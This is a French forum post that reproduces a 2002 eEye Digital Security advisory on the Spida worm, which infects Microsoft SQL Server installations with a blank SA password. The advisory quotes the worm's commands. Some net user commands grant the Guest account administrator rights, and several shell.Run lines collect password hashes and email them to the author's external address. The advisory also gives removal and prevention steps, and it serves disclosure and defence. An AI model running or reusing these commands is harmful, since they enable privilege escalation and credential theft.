nouveau worm : Spida Worm -> faille de SQL Server
Pour info :
__________________________________________________________
Bonjour à tous,
Un nouveau worm, appelé Spida Worm sévit actuellement dans le monde, il s'agit d'un virus qui utilise une faille de SQL Server (pendant l'installation sql server créé un user SA sans password, par défaut)
Du fait qu'ils utilisent la run-time de sql server, les softs suivant seraient également vulnérables :
Access 2000
Visio Enterprise Network Tools
Microsoft Project Central
Compaq Insight Manager Version 7
IBM Director Version 3.1
Les effets et autre détails de ce virus sont en bas de page.
J'espère vous avoir évité une infection !
Meilleures Salutations à tous et à bientôt.
jeff
SQL Worm Analysis
Release Date:
5/22/02
Severity:
High
Systems Affected:
Default installations of Microsoft SQL Server
Description:
The SQL worm (AKA: Spida, Digispid.B.Worm) infects by inserting itself into
MSSQL database servers with no password protecting the SA (System
Administrator) account. The worm executes commands on the vulnerable server
using the "xp_cmdshell" General Extended Procedure, and the commands it
executes activate and configure the Windows "Guest" account so it can be
used to copy files over to the vulnerable machine via Windows file sharing.
After the files have been copied over, they are "hidden" and the worm goes
into a cleanup phase. It deactivates the Guest account and changes the
password for the SA account.
The worm then creates a file containing details about the network
interfaces, database, and Windows account password hashes. This file is
emailed to ixltd@postone.com, which we are guessing is an email box created
by the worm's author. Finally, the target machine begins to scan for other
machines and continues the chain of infection.
Technical Description:
As mentioned before, the SQL worm spreads by inserting itself into MSSQL
database servers that have no password protecting the SA (System
Administrator) account. It executes commands in a command shell (cmd.exe)
using the "xp_cmdshell" General Extended Procedure.
The commands the worm executes are as follows:
net user guest /active:yes
net user guest [random 4 byte lowercase alpha string]
net localgroup administrators guest /add
net group ``Domain Admins`` guest /add
This activates the Guest account, changes the password for the Guest
account, and adds it into higher privilege groups.
Next, the worm "unhides" its files on the infected "attacker" machine, then
it copies itself into the Windows system directory of the vulnerable MSSQL
server. You will not be able to see these files normally because they are
marked "hidden". You can use the "attrib" command from the command shell
(cmd.exe) to unhide and delete them. The description and location of these
files is listed below:
FSCAN portscanner:
%WinDir%\system32\drivers\services.exe
Used to run commands on a remote MSSQL server:
%WinDir%\system32\sqlexec.js
Command Line Emailer:
%WinDir%\system32\clemail.exe
Core worm processing script - contains functionality for scanning,
backdooring, and the sending of retrieved data to the assumed author of the
worm:
%WinDir%\system32\sqlprocess.js
Used for initial worm infection once a vulnerable host is identified:
%WinDir%\system32\sqlinstall.bat
Collects general information about local databases:
%WinDir%\system32\sqldir.js
Simple JavaScript interface to a command shell:
%WinDir%\system32\run.js
Timing library used by the worm:
%WinDir%\system32\timer.dll
SAM library used by pwdump.exe:
%WinDir%\system32\samdump.dll
Grabs password hashes for Windows user accounts; these are not the actual
passwords, but retrieving the actual password is very possible if the
existing passwords are weak:
%WinDir%\system32\pwdump2.exe
Note: %WinDir% is just an environment variable for your Windows base
directory. The shell will replace this with the name of your registered
Windows directory. This is usually "Winnt" or "Windows".
Next the worm will deactivate the Guest account and remove it from the
Administrators and "Domain Admins" groups. After the Guest account is
removed, the worm will also changed the SA account password to a random,
four-byte lowercase alpha string. The worm instance on the target machine
now creates a file containing various information about the server it has
just infected. After the file is assembled it is mailed to the assumed
author of the worm. This process is done with the following commands:
shell.Run("cmd /c ipconfig /all > send.txt", 0, true);
shell.Run("cmd /c cscript sqldir.js . sa " + WScript.Arguments(0) + " /r3s
>> send.txt", 0, true);
shell.Run("cmd /c pwdump2 >> send.txt", 0, true);
shell.Run("clemail.exe -bodyfile send.txt -to ixltd@postone.com -subject
SystemData-" + WScript.Arguments(0), 0, true);
Now the worm triggers the infected target machine to start infecting other
machines in the same manner that it was infected.
Removal:
Change your MSSQL Server "SA" password immediately and disable the Windows
Guest account. If you currently use the Guest account then you should
change the password. You should also change passwords for any other account
on an infected machine because upon infection the password hashes for each
account were collected by worm and emailed to the worm's author. The
passwords may have retrieved by the author or by anyone in the
communication channel between him and you.
Delete the following registry keys:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetDDE\ImagePath
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetDDE\Start
HKEY_LOCAL_MACHINE\software\microsoft\mssqlserver\client\connectto\dsquery
Delete the worm files:
attrib -h %WinDir%\system32\drivers\services.exe
attrib -h %WinDir%\system32\sqlexec.js
attrib -h %WinDir%\system32\clemail.exe
attrib -h %WinDir%\system32\sqlprocess.js
attrib -h %WinDir%\system32\sqlinstall.bat
attrib -h %WinDir%\system32\sqldir.js
attrib -h %WinDir%\system32\run.js
attrib -h %WinDir%\system32\timer.dll
attrib -h %WinDir%\system32\samdump.dll
attrib -h %WinDir%\system32\pwdump2.exe
del %WinDir%\system32\drivers\services.exe
del %WinDir%\system32\sqlexec.js
del %WinDir%\system32\clemail.exe
del %WinDir%\system32\sqlprocess.js
del %WinDir%\system32\sqlinstall.bat
del %WinDir%\system32\sqldir.js
del %WinDir%\system32\run.js
del %WinDir%\system32\timer.dll
del %WinDir%\system32\samdump.dll
del %WinDir%\system32\pwdump2.exe
Unregister the timer.dll used for scan and infection timing:
regsvr32 /u TIMER.DLL
Prevention:
1) Change the "SA" account password on any MSSQL database server that you
administer so that it is not blank or easy to guess.
2) Get all of the latest Service Packs and Hotfixes from Microsoft to help
prevent general worm infection.
Credit:
Riley Hassell
Related Links:
Free SQL Worm Scanner from eEye Digital Security
http://www.eeye.com/html/Research/Tools/sqlworm.html
SQLSecurity.com
http://sqlsecurity.com/
Trend Micro Analysis
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=JS_SQLSPIDA.B
Network Associates Analysis
http://vil.nai.com/vil/content/v_99499.htm
PWDump info
http://www.polivec.com/pwdump3.html
Copyright (c) 1998-2002 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent
of eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at
the user's own risk.
Feedback
Please send suggestions, updates, and comments to:
eEye Digital Security
http://www.eEye.com
info@eEye.com
Répondre avec citation
ATTENTION: lu sur la page de MS:
Partager